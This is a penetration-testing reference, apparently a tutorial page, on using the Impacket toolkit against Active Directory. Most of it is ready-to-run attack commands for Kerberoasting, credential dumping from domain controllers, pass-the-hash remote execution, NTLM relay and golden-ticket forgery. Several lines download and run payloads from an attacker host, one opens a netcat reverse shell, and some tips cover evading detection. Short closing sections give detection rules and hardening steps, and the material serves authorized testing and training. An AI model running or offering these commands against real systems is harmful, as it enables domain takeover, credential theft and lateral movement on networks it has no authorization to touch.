Impacket Toolkit Mastery: Essential Tool for Active Directory Attacks

Comprehensive reference guide to the Impacket toolkit covering essential tools like GetUserSPNs, secretsdump, psexec, ntlmrelayx, and more for AD penetration testing.

Introduction

Impacket is a collection of Python classes for working with network protocols, developed by SecureAuth Corporation (now part of Fortra). It has become the de facto standard toolkit for Active Directory penetration testing, providing pure Python implementations of numerous network protocols including SMB, MSRPC, LDAP, Kerberos, and more.

The toolkit's power lies in its comprehensive protocol support and ease of use. Unlike compiled exploits that require specific environments or architectures, Impacket scripts run anywhere Python is installed, making them ideal for both Linux-based penetration testing and cross-platform red team operations.

Impacket is essential for modern Active Directory assessments because it provides:

Credential dumping from domain controllers and workstations
Remote code execution via multiple protocols (SMB, WMI, DCOM)
Kerberos attacks including Kerberoasting and AS-REP roasting
NTLM relay and authentication abuse
Lateral movement techniques across Windows networks
Domain enumeration without requiring Windows-specific tools

Red Team Essential

Impacket has become so integral to penetration testing that it's pre-installed on all major security distributions (Kali Linux, Parrot OS, BlackArch). Many modern attack frameworks like CrackMapExec and BloodHound rely on Impacket libraries under the hood.

Installation and Setup

Installing Impacket

From Package Manager (Recommended):

Install Impacket from Package Manager

# Kali Linux / Debian-based
sudo apt update
sudo apt install impacket-scripts python3-impacket

# Arch Linux
sudo pacman -S impacket

# Verify installation
impacket-psexec --help

From GitHub (Latest Version):

Install Latest Impacket from GitHub

# Clone repository
git clone https://github.com/fortra/impacket.git
cd impacket

# Install in development mode
pip3 install .

# Alternative: Install with pipx (isolated environment)
pipx install impacket

Using Virtual Environment:

# Create isolated environment
python3 -m venv impacket-env
source impacket-env/bin/activate

# Install Impacket
pip install impacket

# Verify
python3 -c "import impacket; print(impacket.__version__)"

Environment Setup

Configure for Penetration Testing:

Configure Impacket Environment and Aliases

# Set up working directory
mkdir -p ~/pentests/tools/impacket
cd ~/pentests/tools/impacket

# Create alias shortcuts (add to ~/.bashrc or ~/.zshrc)
cat >> ~/.bashrc << 'EOF'
# Impacket aliases
alias imp-psexec='impacket-psexec'
alias imp-smbexec='impacket-smbexec'
alias imp-wmiexec='impacket-wmiexec'
alias imp-secrets='impacket-secretsdump'
alias imp-GetUserSPNs='impacket-GetUserSPNs'
alias imp-GetNPUsers='impacket-GetNPUsers'
alias imp-ntlmrelayx='impacket-ntlmrelayx'
alias imp-smbserver='impacket-smbserver'
EOF

source ~/.bashrc

Core Authentication Tools

GetUserSPNs - Kerberoasting

Description: Enumerate and request Kerberos TGS tickets for service accounts (Kerberoasting attack).

Basic Usage:

Kerberoasting with GetUserSPNs

# Enumerate SPNs and request tickets
impacket-GetUserSPNs DOMAIN.LOCAL/username:password -dc-ip 10.10.11.10 -request

# Output to hashcat format
impacket-GetUserSPNs DOMAIN.LOCAL/username:password -dc-ip 10.10.11.10 -request -outputfile hashes.txt

# Use hash instead of password
impacket-GetUserSPNs DOMAIN.LOCAL/username -hashes :NTHASH -dc-ip 10.10.11.10 -request

Advanced Techniques:

# Target specific user
impacket-GetUserSPNs DOMAIN.LOCAL/username:password -dc-ip 10.10.11.10 -request-user svc_sql

# Use Kerberos authentication (requires TGT)
export KRB5CCNAME=/tmp/krb5cc_ticket
impacket-GetUserSPNs DOMAIN.LOCAL/username -k -no-pass -dc-ip 10.10.11.10 -request

# Save tickets to file
impacket-GetUserSPNs DOMAIN.LOCAL/username:password -dc-ip 10.10.11.10 -request -save

# Stealth mode - enumerate only, no ticket requests
impacket-GetUserSPNs DOMAIN.LOCAL/username:password -dc-ip 10.10.11.10

Example Output:

ServicePrincipalName                    Name        MemberOf  PasswordLastSet             LastLogon  Delegation
--------------------------------------  ----------  --------  --------------------------  ---------  ----------
MSSQLSvc/sql01.domain.local:1433        svc_sql               2025-01-15 08:32:12.394221  <never>
HTTP/web01.domain.local                 svc_web               2024-11-23 14:21:33.182745  <never>

$krb5tgs$23$*svc_sql$DOMAIN.LOCAL$MSSQLSvc/sql01.domain.local:1433*$a8d3b2...

GetNPUsers - AS-REP Roasting

Description: Request AS-REP responses for users that don't require Kerberos pre-authentication.

Basic Usage:

AS-REP Roasting with GetNPUsers

# Enumerate vulnerable users
impacket-GetNPUsers DOMAIN.LOCAL/ -dc-ip 10.10.11.10 -usersfile users.txt -format hashcat

# Single user check
impacket-GetNPUsers DOMAIN.LOCAL/username -no-pass -dc-ip 10.10.11.10

# Request AS-REP for specific user
impacket-GetNPUsers DOMAIN.LOCAL/ -dc-ip 10.10.11.10 -request -usersfile vulnerable_users.txt

Advanced Options:

# Output to John format
impacket-GetNPUsers DOMAIN.LOCAL/ -dc-ip 10.10.11.10 -usersfile users.txt -format john -outputfile asrep_hashes.txt

# Enumerate domain users automatically
impacket-GetNPUsers DOMAIN.LOCAL/username:password -dc-ip 10.10.11.10 -request

# Use with LDAP
impacket-GetNPUsers DOMAIN.LOCAL/username:password -dc-ip 10.10.11.10 -ldapfilter "(userAccountControl:1.2.840.113556.1.4.803:=4194304)"

secretsdump - Credential Extraction

Description: Dump secrets from local SAM, LSA, NTDS.dit, and cached credentials.

SAM Database Dumping:

# Dump local SAM (workstation/server)
impacket-secretsdump administrator:[email protected]

# With NTLM hash
impacket-secretsdump -hashes :NTHASH [email protected]

# Specify specific user
impacket-secretsdump DOMAIN/username:[email protected] -just-dc-user administrator

Domain Controller Credential Dumping:

Dump NTDS.dit from Domain Controller (DCSync)

# Dump NTDS.dit from Domain Controller
impacket-secretsdump DOMAIN.LOCAL/administrator:[email protected] -just-dc

# Extract NTLM hashes only
impacket-secretsdump DOMAIN.LOCAL/administrator:[email protected] -just-dc-ntlm

# Dump specific user
impacket-secretsdump DOMAIN.LOCAL/administrator:[email protected] -just-dc-user krbtgt

# Include historical passwords
impacket-secretsdump DOMAIN.LOCAL/administrator:[email protected] -history

# Use Kerberos authentication
export KRB5CCNAME=/tmp/admin.ccache
impacket-secretsdump DOMAIN.LOCAL/[email protected] -k -no-pass -just-dc

Advanced Techniques:

# VSS (Volume Shadow Copy) method
impacket-secretsdump DOMAIN.LOCAL/administrator:[email protected] -use-vss

# Extract from specific NTDS.dit file
impacket-secretsdump -ntds /path/to/ntds.dit -system /path/to/SYSTEM LOCAL

# Export to specific format
impacket-secretsdump DOMAIN.LOCAL/administrator:[email protected] -outputfile dc_secrets

# Extract Kerberos keys
impacket-secretsdump DOMAIN.LOCAL/administrator:[email protected] -just-dc-user krbtgt -output krbtgt_keys

Example Output:

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a9b30e5b0dc865eadcea9411e4ade72d:::
DOMAIN$:1000:aad3b435b51404eeaad3b435b51404ee:8a4c9b5d2e3f7a1b0c9d8e7f6a5b4c3d:::

Remote Execution Tools

psexec - SMB-based Remote Execution

Description: Execute commands on remote systems via SMB, similar to Windows PsExec.

Basic Execution:

PsExec Remote Command Execution

# Execute with credentials
impacket-psexec DOMAIN/administrator:[email protected]

# Use NTLM hash (Pass-the-Hash)
impacket-psexec -hashes :NTHASH [email protected]

# Execute specific command
impacket-psexec DOMAIN/administrator:[email protected] 'ipconfig /all'

Advanced Options:

# Upload and execute binary
impacket-psexec DOMAIN/administrator:[email protected] -c /tmp/payload.exe

# Use alternative service name (stealth)
impacket-psexec DOMAIN/administrator:[email protected] -service-name svchost

# Execute in specific share
impacket-psexec DOMAIN/administrator:[email protected] -share ADMIN$

# Use Kerberos authentication
export KRB5CCNAME=/tmp/admin.ccache
impacket-psexec DOMAIN/[email protected] -k -no-pass

# Remote binary execution
impacket-psexec DOMAIN/administrator:[email protected] -remote-binary-name update.exe

smbexec - Stealthier SMB Execution

Description: Execute commands via SMB without uploading a service binary (stealthier than psexec).

Basic Usage:

# Standard execution
impacket-smbexec DOMAIN/administrator:[email protected]

# Pass-the-Hash
impacket-smbexec -hashes :NTHASH [email protected]

# Execute command without interactive shell
impacket-smbexec DOMAIN/administrator:[email protected] -mode SERVER 'whoami'

Stealth Techniques:

# Use SHARE mode (writes to writable share)
impacket-smbexec DOMAIN/administrator:[email protected] -mode SHARE

# Specify custom share
impacket-smbexec DOMAIN/administrator:[email protected] -share C$

# Silent execution (no output capture)
impacket-smbexec DOMAIN/administrator:[email protected] -nooutput

wmiexec - WMI-based Execution

Description: Execute commands via Windows Management Instrumentation (more stealthy, no service creation).

Basic Usage:

# Standard WMI execution
impacket-wmiexec DOMAIN/administrator:[email protected]

# Pass-the-Hash
impacket-wmiexec -hashes :NTHASH [email protected]

# Execute specific command
impacket-wmiexec DOMAIN/administrator:[email protected] 'tasklist'

Advanced Techniques:

# Silent execution (no output)
impacket-wmiexec DOMAIN/administrator:[email protected] -nooutput -c 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(\"http://10.10.14.5/payload.ps1\")"'

# Use specific namespace
impacket-wmiexec DOMAIN/administrator:[email protected] -namespace root/cimv2

# Execute PowerShell command
impacket-wmiexec DOMAIN/administrator:[email protected] 'powershell -c "Get-Process"'

# Use Kerberos
export KRB5CCNAME=/tmp/admin.ccache
impacket-wmiexec DOMAIN/[email protected] -k -no-pass

atexec - Task Scheduler Execution

Description: Execute commands via Windows Task Scheduler (useful when SMB/WMI are restricted).

Usage:

# Basic execution
impacket-atexec DOMAIN/administrator:[email protected] 'whoami'

# Schedule task for specific time
impacket-atexec DOMAIN/administrator:[email protected] -at 14:30 'cmd.exe /c calc.exe'

# Pass-the-Hash
impacket-atexec -hashes :NTHASH [email protected] 'systeminfo'

# Silent background execution
impacket-atexec DOMAIN/administrator:[email protected] 'powershell -c "Start-Process calc.exe"'

dcomexec - DCOM-based Execution

Description: Execute commands via Distributed Component Object Model.

Usage:

# Standard DCOM execution
impacket-dcomexec DOMAIN/administrator:[email protected]

# Specify DCOM object (default: MMC20.Application)
impacket-dcomexec DOMAIN/administrator:[email protected] -object ShellWindows

# Pass-the-Hash
impacket-dcomexec -hashes :NTHASH [email protected] 'cmd.exe'

NTLM Relay and Authentication

ntlmrelayx - NTLM Relay Attack Framework

Description: Relay NTLM authentication to target systems for exploitation.

Basic Relay:

NTLM Relay Attack

# Basic relay to target list
impacket-ntlmrelayx -tf targets.txt -smb2support

# Relay with command execution
impacket-ntlmrelayx -tf targets.txt -smb2support -c 'whoami'

# Dump SAM database
impacket-ntlmrelayx -tf targets.txt -smb2support

Advanced Relay Techniques:

# Interactive SMB shell
impacket-ntlmrelayx -tf targets.txt -smb2support -i

# SOCKS proxy for tunneling
impacket-ntlmrelayx -tf targets.txt -smb2support -socks

# Relay to specific protocol (LDAP)
impacket-ntlmrelayx -t ldap://dc01.domain.local -smb2support

# Relay and dump Domain Admin hashes
impacket-ntlmrelayx -t ldap://dc01.domain.local -smb2support --dump-adcs

# Relay to HTTP
impacket-ntlmrelayx -t http://web01.domain.local/endpoint -smb2support

# Execute PowerShell payload
impacket-ntlmrelayx -tf targets.txt -smb2support -c 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(\"http://10.10.14.5/shell.ps1\")"'

LDAP Relay for Privilege Escalation:

NTLM Relay to LDAP for Privilege Escalation

# Create new Domain Admin account
impacket-ntlmrelayx -t ldaps://dc01.domain.local -smb2support --add-computer

# Delegate permissions (RBCD attack)
impacket-ntlmrelayx -t ldaps://dc01.domain.local -smb2support --delegate-access

# Extract LAPS passwords
impacket-ntlmrelayx -t ldaps://dc01.domain.local -smb2support --dump-laps

HTTP Relay:

# Start HTTP server and relay
impacket-ntlmrelayx -t smb://10.10.11.45 -smb2support

# Relay from HTTP to SMB
impacket-ntlmrelayx -t smb://10.10.11.45 -smb2support -e /tmp/payload.exe

# WebDAV relay
impacket-ntlmrelayx -t http://sharepoint.domain.local -smb2support

Kerberos Tools

getST - Request Service Tickets

Description: Request Kerberos service tickets for specific SPNs.

Usage:

# Request service ticket
impacket-getST DOMAIN.LOCAL/username:password -spn MSSQLSvc/sql01.domain.local:1433

# Use TGT to request ticket
export KRB5CCNAME=/tmp/user.ccache
impacket-getST DOMAIN.LOCAL/username -k -no-pass -spn HTTP/web01.domain.local

# Request ticket with AES key
impacket-getST DOMAIN.LOCAL/username -aesKey <AES256_KEY> -spn CIFS/file01.domain.local

# Impersonate user (S4U2Self)
impacket-getST DOMAIN.LOCAL/username:password -spn CIFS/dc01.domain.local -impersonate administrator

ticketConverter - Convert Ticket Formats

Description: Convert between different Kerberos ticket formats (ccache, kirbi).

Usage:

# Convert kirbi to ccache
impacket-ticketConverter ticket.kirbi ticket.ccache

# Convert ccache to kirbi
impacket-ticketConverter ticket.ccache ticket.kirbi

# Use converted ticket
export KRB5CCNAME=ticket.ccache
impacket-psexec DOMAIN.LOCAL/[email protected] -k -no-pass

getTGT - Request Ticket Granting Tickets

Description: Request TGT for a user account.

Usage:

# Request TGT with password
impacket-getTGT DOMAIN.LOCAL/username:password

# Request TGT with NTLM hash
impacket-getTGT DOMAIN.LOCAL/username -hashes :NTHASH

# Request TGT with AES key
impacket-getTGT DOMAIN.LOCAL/username -aesKey <AES256_KEY>

# Save to specific file
impacket-getTGT DOMAIN.LOCAL/username:password -dc-ip 10.10.11.10 -save username.ccache

Network Services

smbserver - SMB File Server

Description: Create a simple SMB server for file transfers.

Basic Usage:

# Create anonymous SMB share
impacket-smbserver share /tmp/share

# Create authenticated share
impacket-smbserver share /tmp/share -smb2support -username user -password password

# Listen on specific interface
impacket-smbserver share /tmp/share -smb2support -ip 10.10.14.5

Windows Client Commands:

# Map network drive
net use Z: \\10.10.14.5\share /user:user password

# Copy files to share
copy C:\Windows\System32\config\SAM Z:\

# Execute from share
\\10.10.14.5\share\payload.exe

smbclient - SMB Client

Description: Connect to SMB shares and perform file operations.

Basic Usage:

# Connect to share
impacket-smbclient DOMAIN/username:[email protected]

# List shares
impacket-smbclient -L //10.10.11.45 -U username

# Download file
impacket-smbclient DOMAIN/username:[email protected] -c 'get passwords.txt'

# Upload file
impacket-smbclient DOMAIN/username:[email protected] -c 'put payload.exe'

mssqlclient - MSSQL Client

Description: Connect to Microsoft SQL Server instances.

Basic Connection:

# Connect with credentials
impacket-mssqlclient DOMAIN/username:[email protected]

# Windows authentication
impacket-mssqlclient DOMAIN/username:[email protected] -windows-auth

# Pass-the-Hash
impacket-mssqlclient -hashes :NTHASH [email protected] -windows-auth

SQL Server Exploitation:

# Connect to MSSQL
impacket-mssqlclient sa:[email protected]

# Enable xp_cmdshell
SQL> enable_xp_cmdshell

# Execute OS commands
SQL> xp_cmdshell whoami

# Read file
SQL> xp_cmdshell type C:\Users\Administrator\Desktop\flag.txt

# Upload file via SMB
SQL> xp_cmdshell powershell -c "IWR -Uri http://10.10.14.5/nc.exe -OutFile C:\temp\nc.exe"

# Reverse shell
SQL> xp_cmdshell C:\temp\nc.exe 10.10.14.5 4444 -e cmd.exe

Enumeration Tools

samrdump - SAM Enumeration

Description: Enumerate users via SAM RPC protocol.

Usage:

# Enumerate via port 445
impacket-samrdump DOMAIN/username:[email protected]

# Enumerate via port 139
impacket-samrdump DOMAIN/username:[email protected] 139/SMB

# Anonymous enumeration
impacket-samrdump @10.10.11.45

rpcdump - RPC Endpoint Mapping

Description: Enumerate RPC endpoints on target systems.

Usage:

# Dump RPC endpoints (port 135)
impacket-rpcdump DOMAIN/username:[email protected] 135

# Dump via SMB (port 445)
impacket-rpcdump DOMAIN/username:[email protected] 445

# Enumerate specific interface
impacket-rpcdump DOMAIN/username:[email protected] -brute-opnums

reg - Remote Registry Access

Description: Query and modify remote Windows Registry.

Usage:

# Query registry key
impacket-reg DOMAIN/username:[email protected] query -keyName HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion

# Read specific value
impacket-reg DOMAIN/username:[email protected] query -keyName "HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters" -v "NullSessionShares"

# Add registry key
impacket-reg DOMAIN/username:[email protected] add -keyName "HKLM\\SOFTWARE\\Test" -v TestValue -vd "TestData" -vt REG_SZ

# Delete registry key
impacket-reg DOMAIN/username:[email protected] delete -keyName "HKLM\\SOFTWARE\\Test"

Practical Attack Scenarios

Scenario 1: Initial Domain Compromise

# Step 1: Enumerate users (null session)
impacket-GetNPUsers DOMAIN.LOCAL/ -dc-ip 10.10.11.10 -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt

# Step 2: Crack AS-REP hashes
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt

# Step 3: Kerberoast with compromised credentials
impacket-GetUserSPNs DOMAIN.LOCAL/user:password -dc-ip 10.10.11.10 -request -outputfile spn_hashes.txt

# Step 4: Crack Kerberoast hashes
hashcat -m 13100 spn_hashes.txt /usr/share/wordlists/rockyou.txt --rules-file /usr/share/hashcat/rules/best64.rule

# Step 5: Dump credentials with compromised service account
impacket-secretsdump DOMAIN.LOCAL/svc_sql:[email protected] -just-dc

Scenario 2: Lateral Movement

# Step 1: Verify credentials across multiple hosts
crackmapexec smb 10.10.11.0/24 -u administrator -H <NTLM_HASH> --continue-on-success

# Step 2: Execute commands on reachable hosts
impacket-wmiexec -hashes :<NTLM_HASH> [email protected] 'ipconfig /all'

# Step 3: Dump local SAM on each host
impacket-secretsdump -hashes :<NTLM_HASH> [email protected]

# Step 4: Move to next target with obtained credentials
impacket-psexec DOMAIN/newuser:[email protected]

Scenario 3: NTLM Relay Attack

# Step 1: Configure Responder
sed -i 's/SMB = On/SMB = Off/g' /etc/responder/Responder.conf
sed -i 's/HTTP = On/HTTP = Off/g' /etc/responder/Responder.conf

# Step 2: Start Responder
sudo responder -I eth0 -wv

# Step 3: Setup ntlmrelayx (separate terminal)
impacket-ntlmrelayx -tf targets.txt -smb2support -socks

# Step 4: Trigger authentication (social engineering, forced browsing, etc.)
# UNC path: \\attacker-ip\share

# Step 5: Use SOCKS proxy for authentication
proxychains impacket-secretsdump DOMAIN/[email protected]

Scenario 4: Domain Controller Compromise

# Step 1: Verify Domain Admin credentials
impacket-psexec DOMAIN/Administrator:[email protected] 'whoami'

# Step 2: Dump NTDS.dit
impacket-secretsdump DOMAIN/Administrator:[email protected] -just-dc -outputfile dc_dump

# Step 3: Extract krbtgt hash for Golden Ticket
grep krbtgt dc_dump.ntds

# Step 4: Create Golden Ticket
impacket-ticketer -nthash <KRBTGT_HASH> -domain-sid <DOMAIN_SID> -domain DOMAIN.LOCAL administrator

# Step 5: Use Golden Ticket
export KRB5CCNAME=administrator.ccache
impacket-psexec DOMAIN.LOCAL/[email protected] -k -no-pass

Defensive Detection

Detecting Impacket Usage

Network Signatures:

# Snort rule for Impacket PsExec
alert tcp any any -> any 445 (msg:"Impacket PsExec Service Creation"; content:"|ff|SMB"; offset:4; depth:4; content:"svcctl"; nocase; sid:1000001;)

# Zeek/Bro detection
# Look for unusual SMB service names (common with psexec)
event smb_message::request_create_pipe(c: connection, hdr: SMB::Header, path: string) {
    if (/^(PSEXESVC|BTOBTO|REMCOM)/ in path) {
        NOTICE([$note=Suspicious_SMB_Pipe, $msg="Possible PsExec execution", $conn=c]);
    }
}

Windows Event Logs:

# Event ID 4688: Process Creation
# Look for suspicious command lines
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4688} |
    Where-Object {$_.Properties[8].Value -match 'cmd\.exe.*\\\\127\.0\.0\.1'} |
    Select-Object TimeCreated, @{N='CommandLine';E={$_.Properties[8].Value}}

# Event ID 5145: Network Share Object Access
# Monitor for __output file creation (used by smbexec/wmiexec)
Get-WinEvent -FilterHashtable @{LogName='Security';ID=5145} |
    Where-Object {$_.Properties[3].Value -match '__output|__ADMIN'}

# Event ID 4697: Service Installation
# Detect PsExec-style service creation
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4697} |
    Where-Object {$_.Properties[1].Value -match 'PSEXESVC|BTOBTO'}

Sigma Rules:

title: Impacket PsExec Execution
status: experimental
description: Detects PsExec-like execution using Impacket
references:
  - https://github.com/fortra/impacket
tags:
  - attack.execution
  - attack.t1569.002
logsource:
  product: windows
  service: security
detection:
  selection_service:
    EventID: 4697
    ServiceFileName|contains:
      - '\ADMIN$\'
      - 'PSEXESVC'
  condition: selection_service
falsepositives:
  - Legitimate administrative tools
level: high

Mitigation Strategies

SMB Hardening:

# Enable SMB signing (required)
Set-SmbServerConfiguration -RequireSecuritySignature $True -Force

# Disable SMBv1
Set-SmbServerConfiguration -EnableSMB1Protocol $False -Force

# Enable SMB encryption
Set-SmbServerConfiguration -EncryptData $True -Force

Credential Protection:

# Enable Credential Guard
# Requires Windows 10 Enterprise/Server 2016+
# Set via Group Policy: Computer Configuration > Administrative Templates > System > Device Guard

# Enable LSASS Protection (PPL)
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "RunAsPPL" -Value 1

# Disable NTLM authentication
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "LmCompatibilityLevel" -Value 5

Network Segmentation:

# Block SMB at perimeter firewall
iptables -A INPUT -p tcp --dport 445 -s ! 10.0.0.0/8 -j DROP
iptables -A INPUT -p tcp --dport 139 -s ! 10.0.0.0/8 -j DROP

# Restrict RPC access
iptables -A INPUT -p tcp --dport 135 -s ! 10.0.0.0/8 -j DROP

Best Practices for Penetration Testers

Operational Security

# Use Kerberos authentication when possible (stealthier)
export KRB5CCNAME=/tmp/ticket.ccache
impacket-wmiexec DOMAIN/[email protected] -k -no-pass

# Avoid creating easily detectable service names
impacket-psexec DOMAIN/admin:pass@target -service-name svchost

# Use authenticated encryption for Kerberos
impacket-getST DOMAIN/user:pass -spn HTTP/target -aesKey <AES256_KEY>

# Clean up artifacts
impacket-psexec DOMAIN/admin:pass@target 'del C:\Windows\Temp\*.exe'

Documentation and Reporting

# Log all Impacket commands
script -a impacket_session.log

# Save all output to files
impacket-secretsdump DOMAIN/admin:pass@dc | tee secretsdump_output.txt

# Generate timestamp for each command
echo "[$(date '+%Y-%m-%d %H:%M:%S')] Running secretsdump..." >> audit.log

References

MITRE ATT&CK Techniques

T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting - GetUserSPNs
T1558.004 - Steal or Forge Kerberos Tickets: AS-REP Roasting - GetNPUsers
T1003.003 - OS Credential Dumping: NTDS - secretsdump (DCSync)
T1003.002 - OS Credential Dumping: Security Account Manager - secretsdump (SAM)
T1569.002 - System Services: Service Execution - psexec/smbexec
T1047 - Windows Management Instrumentation - wmiexec
T1557.001 - Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning - ntlmrelayx
T1550.002 - Use Alternate Authentication Material: Pass the Hash - PtH attacks
T1550.003 - Use Alternate Authentication Material: Pass the Ticket - Kerberos ticket usage

MITRE ATT&CK Software

S0357 - Impacket - Official ATT&CK software entry

Official Documentation

Impacket GitHub Repository - Source code
Impacket Documentation - SecureAuth docs

Security Resources

HackTricks: Impacket Usage - Attack techniques

Next Steps

After mastering Impacket:

Practice in controlled lab environments (Active Directory lab, HackTheBox, TryHackMe)
Combine with other tools like CrackMapExec, BloodHound, and Rubeus
Understand defensive detection mechanisms for responsible disclosure
Develop custom scripts using Impacket libraries for specialized attacks
Explore related Active Directory attack techniques:

Takeaway: Impacket is the cornerstone toolkit for Active Directory penetration testing, providing comprehensive protocol implementations for every stage of an assessment from initial enumeration to post-exploitation. Mastering Impacket tools like GetUserSPNs, secretsdump, psexec, and ntlmrelayx is essential for any security professional working with Windows environments. Always use these powerful tools responsibly with proper authorization, and understand defensive detection mechanisms to provide comprehensive security assessments.

Impacket Toolkit Mastery: Essential Tool for Active Directory Attacks

On this page